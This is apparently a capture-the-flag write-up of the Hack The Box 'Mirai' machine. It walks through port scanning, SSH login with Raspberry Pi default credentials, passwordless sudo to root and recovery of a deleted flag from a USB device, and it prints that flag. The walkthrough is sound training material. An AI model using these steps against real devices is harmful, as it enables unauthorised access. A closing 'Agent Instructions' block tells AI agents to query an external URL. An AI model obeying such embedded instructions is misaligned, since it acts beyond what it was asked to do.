# HTB - Mirai ![Mirai](/files/-M3ni0e-Kydo_57q0ANI) ## Getting Root: 1. The box reveals that is running **pi-hole** which is basically an application designed for use on embedded devices such as the raspberry-pi 2. We can ssh to the box using the raspberry-pi default credentials and noticed we have full access privileges using sudo. ### Tools Used: **`nmap, dirsearch.py, ssh, grep`** ## Nmap: ```bash # Nmap 7.80 scan initiated Tue Mar 31 17:15:24 2020 as: nmap -sC -sV -p- -oA nmap/Mirai.allports 10.10.10.48 Nmap scan report for 10.10.10.48 Host is up (0.042s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA) | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA) | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA) |_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519) 53/tcp open domain dnsmasq 2.76 | dns-nsid: |_ bind.version: dnsmasq-2.76 80/tcp open http lighttpd 1.4.35 |_http-server-header: lighttpd/1.4.35 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 1771/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) 32400/tcp open http Plex Media Server httpd | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-cors: HEAD GET POST PUT DELETE OPTIONS |_http-title: Unauthorized 32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Mar 31 17:16:05 2020 -- 1 IP address (1 host up) scanned in 40.63 seconds ``` ## Enumeration ### HTTP - Port 80 ```bash # dirsearch.py -u http://10.10.10.48 -E -t 30 [sudo] password for kali: _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 30 | Wordlist size: 8674 Error Log: /opt/dirsearch/logs/errors-20-03-31_23-28-43.log Target: http://10.10.10.48 [23:28:43] Starting: [23:28:47] 301 - 0B - /admin -> http://10.10.10.48/admin/ [23:28:47] 200 - 14KB - /admin/ [23:28:47] 200 - 14KB - /admin/?/login [23:28:47] 200 - 14KB - /admin/index.php Task Completed kali@oscp:~/HackTheBox/Mirai$ ``` #### Checking **`/admin`** ![](/files/-M3nmZgtb8-NR4vdQwdM) A basic google search on raspberry pi default credentials shows:\ **Username:** **`pi`**\ **Password:** **`raspberry`** ## Getting Access ```bash # ssh pi@10.10.10.48 The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established. ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts. pi@10.10.10.48's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Aug 27 14:47:50 2017 from localhost SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. pi@raspberrypi:~ $ id uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi) pi@raspberrypi:~ $ ``` ## Privilege Escalation ```bash sudo -l Matching Defaults entries for pi on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User pi may run the following commands on localhost: (ALL : ALL) ALL (ALL) NOPASSWD: ALL ``` ## Root ```bash pi@raspberrypi:~ $ sudo su - SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. root@raspberrypi:~# id uid=0(root) gid=0(root) groups=0(root) root@raspberrypi:~# ``` ### Missing Flag ```bash root@raspberrypi:~# ls -la total 22 drwx------ 3 root root 4096 Aug 27 2017 . drwxr-xr-x 35 root root 4096 Aug 14 2017 .. -rw------- 1 root root 549 Dec 24 2017 .bash_history -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc -rw-r--r-- 1 root root 140 Nov 19 2007 .profile -rw-r--r-- 1 root root 76 Aug 14 2017 root.txt drwx------ 2 root root 4096 Aug 27 2017 .ssh root@raspberrypi:~# cat root.txt I lost my original root.txt! I think I may have a backup on my USB stick... root@raspberrypi:~# ``` It said that a backup of the root flag may be on a USB stick, so we checked for mounted devices and noticed **`/media/usbstick`** ```bash root@raspberrypi:~# df -hT Filesystem Type Size Used Avail Use% Mounted on aufs aufs 8.5G 2.8G 5.3G 35% / tmpfs tmpfs 100M 4.8M 96M 5% /run /dev/sda1 iso9660 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1 /dev/loop0 squashfs 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs tmpfs tmpfs 250M 0 250M 0% /lib/live/mount/overlay /dev/sda2 ext4 8.5G 2.8G 5.3G 35% /lib/live/mount/persistence/sda2 devtmpfs devtmpfs 10M 0 10M 0% /dev tmpfs tmpfs 250M 8.0K 250M 1% /dev/shm tmpfs tmpfs 5.0M 4.0K 5.0M 1% /run/lock tmpfs tmpfs 250M 0 250M 0% /sys/fs/cgroup tmpfs tmpfs 250M 8.0K 250M 1% /tmp /dev/sdb ext4 8.7M 93K 7.9M 2% /media/usbstick tmpfs tmpfs 50M 0 50M 0% /run/user/999 tmpfs tmpfs 50M 0 50M 0% /run/user/1000 ``` But there was nothing there. ```bash root@raspberrypi:~# cd /media/usbstick/ root@raspberrypi:/media/usbstick# ls -la total 18 drwxr-xr-x 3 root root 1024 Aug 14 2017 . drwxr-xr-x 3 root root 4096 Aug 14 2017 .. -rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt drwx------ 2 root root 12288 Aug 14 2017 lost+found root@raspberrypi:/media/usbstick# cat damnit.txt Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James root@raspberrypi:/media/usbstick# ``` Doing some forensics on the /dev/sdb device showed some interesting pieces of data such as **`root.txt`** and what it looked like a hash . In Linux everything is a file, so a simple use of strings and grep did the job. ```bash root@raspberrypi:~# strings /dev/sdb >r & /media/usbstick lost+found root.txt damnit.txt >r & >r & /media/usbstick lost+found root.txt damnit.txt >r & /media/usbstick 2]8^ lost+found root.txt damnit.txt >r & 3d3e483143ff12ec505d026fa13e020b Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James OR root@raspberrypi:~# egrep -a "([a-z0-9]){32}" /dev/sdb |}*,.+-3d3e483143ff12ec505d026fa13e020b root@raspberrypi:~# ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/htb-writeups/writeups/htb-mirai.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.